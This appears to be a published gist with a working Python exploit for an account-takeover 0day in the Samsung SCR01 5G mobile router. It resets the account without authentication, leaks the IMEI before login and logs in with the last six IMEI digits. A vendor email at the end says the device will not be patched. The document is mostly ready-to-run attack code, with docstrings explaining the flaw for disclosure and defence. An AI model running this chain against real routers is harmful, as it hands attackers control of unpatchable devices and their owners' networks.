@stypr
Last active April 24, 2025 10:19
Samsung 5G Mobile Router(SCR01) Account Takeover 0day
import os
import time
import uuid
import requests
# Silence urllib3's InsecureRequestWarning: every request in this script passes
# verify=False, so the router's TLS certificate is never validated.
requests.packages.urllib3.disable_warnings()

# Browser-like headers sent with every request. This dict is mutated at runtime:
# account_bypass() adds "X-Csrf-Token" after a successful login, and the
# __main__ block sets "Origin" and "Referer".
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/json;charset=utf-8",
    "Sec-GPC": "1",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "DNT": "1",
}

# Router address. Left empty here and assigned in the __main__ block (which runs
# at module scope, so the assignment rebinds this global).
HOST = ""
def login(password):
    """Authenticate to the router with *password*.

    Posts ``signin:password:s`` to ``/_set/mhs`` and returns the
    ``csrf_token:s`` value from the JSON reply when it is present and
    non-empty; otherwise returns ``None``. There is no error handling:
    transport errors from ``requests`` propagate, and ``r.json()`` raises
    if the body is not JSON.
    """
    url = f"https://{HOST}/_set/mhs"
    data = {"signin:password:s": password}
    # verify=False: the router's certificate is not checked (see the
    # disable_warnings() call at module level).
    r = requests.post(url, headers=headers, json=data, verify=False)
    response = r.json()
    # A truthy csrf_token:s is the only success signal this script relies on.
    if response.get("csrf_token:s"):
        return response.get("csrf_token:s")
    else:
        return None
def reset_account():
    """Trigger the router's account reset without any session or CSRF token.

    Posts ``signin:reset_account:b`` to ``/_set/mhs`` and returns the parsed
    JSON reply unchanged. Per the note below, the reset sets the login
    password to the last 6 digits of the IMEI; combined with the pre-auth
    IMEI disclosure in leak_imei(), that is the root cause of the takeover:
    a state-changing endpoint reachable before authentication, plus a
    recovery password derived from an identifier that is itself readable
    before authentication. From a monitoring standpoint an unauthenticated
    write carrying ``signin:reset_account:b`` is the high-signal event.
    """
    # reset password will set password to last 6 digits of IMEI.
    url = f"https://{HOST}/_set/mhs"
    data = {"signin:reset_account:b": "true"}
    r = requests.post(url, headers=headers, json=data, verify=False)
    response = r.json()
    return response
def account_bypass():
    """Run the full chain: reset the account, read the IMEI, log in.

    Returns the derived password (last six characters of the leaked IMEI)
    when login() yields a CSRF token, else ``None``. Side effect: on success
    the token is stored in the module-level ``headers`` dict as
    ``X-Csrf-Token`` for later requests.

    Notes for the reader:
    - The IMEI loop has no retry bound: it keeps re-posting to the device
      until ``more_settings:o.imei:s`` comes back non-empty.
    - ``imei[-6:]`` assumes the leaked value is a string (the ``:s`` key
      suffix suggests so) and that it is at least six characters long;
      neither is checked here.
    - The vendor reply quoted at the end of this page states no update is
      planned for the device, so exposure of the admin interface is the
      thing a defender can still control.
    """
    # Reset password so that password is based on IMEI
    print("Reset account...")
    reset_account()
    # Leak IMEI
    print("Leak IMEI...")
    # Sentinel -1 only serves to enter the loop; afterwards imei is whatever
    # the device returned (possibly None, which also keeps the loop going).
    imei = -1
    while not imei or imei == -1:
        imei = leak_imei().get("more_settings:o", {}).get("imei:s")
        if not imei:
            print("Retry leak..")
    print(f"Leaked IMEI: {imei}")
    # Attempt login based on leaked IMEI
    password = imei[-6:]
    print(f"Password: {password}")
    login_result = login(password)
    if login_result:
        print(f"Login success! CSRF: {login_result}")
        # Mutates the shared headers dict; every later request carries the token.
        headers['X-Csrf-Token'] = login_result
        return password
    print("Login failed..")
    return None
def leak_imei():
    """Query ``/_get/mhs`` before authentication and return the parsed JSON reply.

    The request body lists the fields to read. Only ``more_settings:o.imei:s``
    is consumed by account_bypass(); the other ``signin:`` / ``communication:``
    keys are requested as well but not used anywhere in this script. The
    comment inside the body is the author's: the ``more_settings:o`` object is
    answered without a session, which is the information-disclosure half of
    the chain.
    """
    url = f"https://{HOST}/_get/mhs"
    data = {
        # more_settings directly leaks info from pre-auth which isn't supposed to happen.
        # This forcefully leaks IMEI and phone info.
        "more_settings:o": {
            "imei:s":"",
        },
        "signin:wifi_connection:s":"",
        "signin:device_name:s":"",
        "signin:default_password:b":"",
        "communication:mode:i":"",
        "communication:hs_mode:b":"",
        "signin:update_software:s":"",
        "signin:first_time_to_access:b":"",
    }
    r = requests.post(url, headers=headers, json=data, verify=False)
    # Whole reply is returned; the caller picks the key it needs.
    return r.json()
if __name__ == "__main__":
    # Hard-coded router address as in the original; this runs at module scope,
    # so it rebinds the module-level HOST used by the functions above.
    HOST = "192.168.1.1"
    headers['Origin'] = f"https://{HOST}"
    headers['Referer'] = f"https://{HOST}/sign-in"
    password = account_bypass()
    # NOTE: account_bypass() returns None on failure and nothing checks for
    # that here, so login() is then called with password=None and posts a
    # null password.
    session = login(password)
    print(session)
```
Hello Harold Kim,
We sincerely apologize for the late reply, as we needed additional time to confirm this with the internal stakeholders.
We are sorry to inform you that there are no planned updates for Samsung 5G Mobile Router(SCR01) since it is an obsolete device.
We are sorry again our reply did not meet your expectations.
Thank you very much.
Sincerely,
Samsung Mobile Security
```